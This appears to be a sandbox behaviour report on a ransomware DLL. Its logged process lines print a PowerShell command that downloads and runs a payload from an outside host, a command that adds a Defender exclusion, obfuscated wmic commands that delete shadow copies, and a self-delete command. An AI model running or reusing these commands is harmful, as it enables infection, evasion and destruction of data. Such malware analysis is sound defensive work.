Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe Process created: C:\Windows\System32\wbem\WMIC.exe c:\SYeXIP\SYeX\..\..\Windows\SYeX\SYeX\..\..\system32\SYeX\SYeX\..\..\wbem\SYeX\SYeXI\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe Process created: C:\Windows\System32\wbem\WMIC.exe c:\xGRceo\xGRc\..\..\Windows\xGRc\xGRc\..\..\system32\xGRc\xGRc\..\..\wbem\xGRc\xGRce\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe Process created: C:\Windows\System32\wbem\WMIC.exe c:\ZiHrdF\ZiHr\..\..\Windows\ZiHr\ZiHr\..\..\system32\ZiHr\ZiHr\..\..\wbem\ZiHr\ZiHrd\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe Process created: C:\Windows\System32\wbem\WMIC.exe c:\klzShx\klzS\..\..\Windows\klzS\klzS\..\..\system32\klzS\klzS\..\..\wbem\klzS\klzSh\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe Process created: C:\Windows\System32\wbem\WMIC.exe c:\NTdKVj\NTdK\..\..\Windows\NTdK\NTdK\..\..\system32\NTdK\NTdK\..\..\wbem\NTdK\NTdKV\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File moved: C:\Users\user\Desktop\SQSJKEBWDT.jpg
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File deleted: C:\Users\user\Desktop\SQSJKEBWDT.jpg
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File moved: C:\Users\user\Desktop\GAOBCVIQIJ.png
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File deleted: C:\Users\user\Desktop\GAOBCVIQIJ.png
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File moved: C:\Users\user\Desktop\QNCYCDFIJJ.pdf

System Summary

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\eryy65ty.exe
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\eryy65ty.exe D2100FFE58EB50C05D97A3DA738CCD1F0BE9672C057C26A10140AF80595B78C3
Source: C:\Windows\System32\loaddll32.exe Code function: String function: 6D4087F0 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe Code function: String function: 00E8D9BB appears 52 times
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe Code function: String function: 00E8E6C0 appears 56 times
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe Code function: String function: 00E462B0 appears 57 times
Source: TD2HjoogPx.dll Static PE information: invalid certificate
Source: TD2HjoogPx.dll Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: classification engine Classification label: mal100.rans.phis.troj.spyw.evad.winDLL@62/710@1/1
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe Code function: 20_2_00E3ABA0 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,CloseHandle,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File created: C:\Users\user\Desktop\Decryptfiles.txt
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6276:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6664:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8164:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5840:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6452:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8076:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1196:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6780:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2440:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5168:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7892:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:6848:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jqpkpgtj.bos.ps1
Source: TD2HjoogPx.dll Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File read: \Device\CdRom0\sources\cversion.ini
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\TD2HjoogPx.dll",#1
Source: TD2HjoogPx.dll Virustotal: Detection: 44%
Source: TD2HjoogPx.dll ReversingLabs: Detection: 36%
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\TD2HjoogPx.dll"
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\TD2HjoogPx.dll",#1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\TD2HjoogPx.dll",#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c %temp%/eryy65ty.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c %temp%/eryy65ty.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\eryy65ty.exe C:\Users\user\AppData\Local\Temp/eryy65ty.exe
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe Process created: C:\Windows\System32\wbem\WMIC.exe c:\SYeXIP\SYeX\..\..\Windows\SYeX\SYeX\..\..\system32\SYeX\SYeX\..\..\wbem\SYeX\SYeXI\..\..\wmic.exe shadowcopy delete
Source: C:\Windows\System32\wbem\WMIC.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\eryy65ty.exe "C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe Process created: C:\Windows\System32\wbem\WMIC.exe c:\xGRceo\xGRc\..\..\Windows\xGRc\xGRc\..\..\system32\xGRc\xGRc\..\..\wbem\xGRc\xGRce\..\..\wmic.exe shadowcopy delete
Source: C:\Windows\System32\wbem\WMIC.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\eryy65ty.exe "C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe Process created: C:\Windows\System32\wbem\WMIC.exe c:\ZiHrdF\ZiHr\..\..\Windows\ZiHr\ZiHr\..\..\system32\ZiHr\ZiHr\..\..\wbem\ZiHr\ZiHrd\..\..\wmic.exe shadowcopy delete
Source: C:\Windows\System32\wbem\WMIC.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe Process created: C:\Windows\System32\wbem\WMIC.exe c:\klzShx\klzS\..\..\Windows\klzS\klzS\..\..\system32\klzS\klzS\..\..\wbem\klzS\klzSh\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
Source: C:\Windows\System32\wbem\WMIC.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe Process created: C:\Windows\System32\wbem\WMIC.exe c:\NTdKVj\NTdK\..\..\Windows\NTdK\NTdK\..\..\system32\NTdK\NTdK\..\..\wbem\NTdK\NTdKV\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
Source: C:\Windows\System32\wbem\WMIC.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: unknown Process created: C:\Windows\System32\notepad.exe "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptfiles.txt
Source: C:\Windows\System32\loaddll32.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
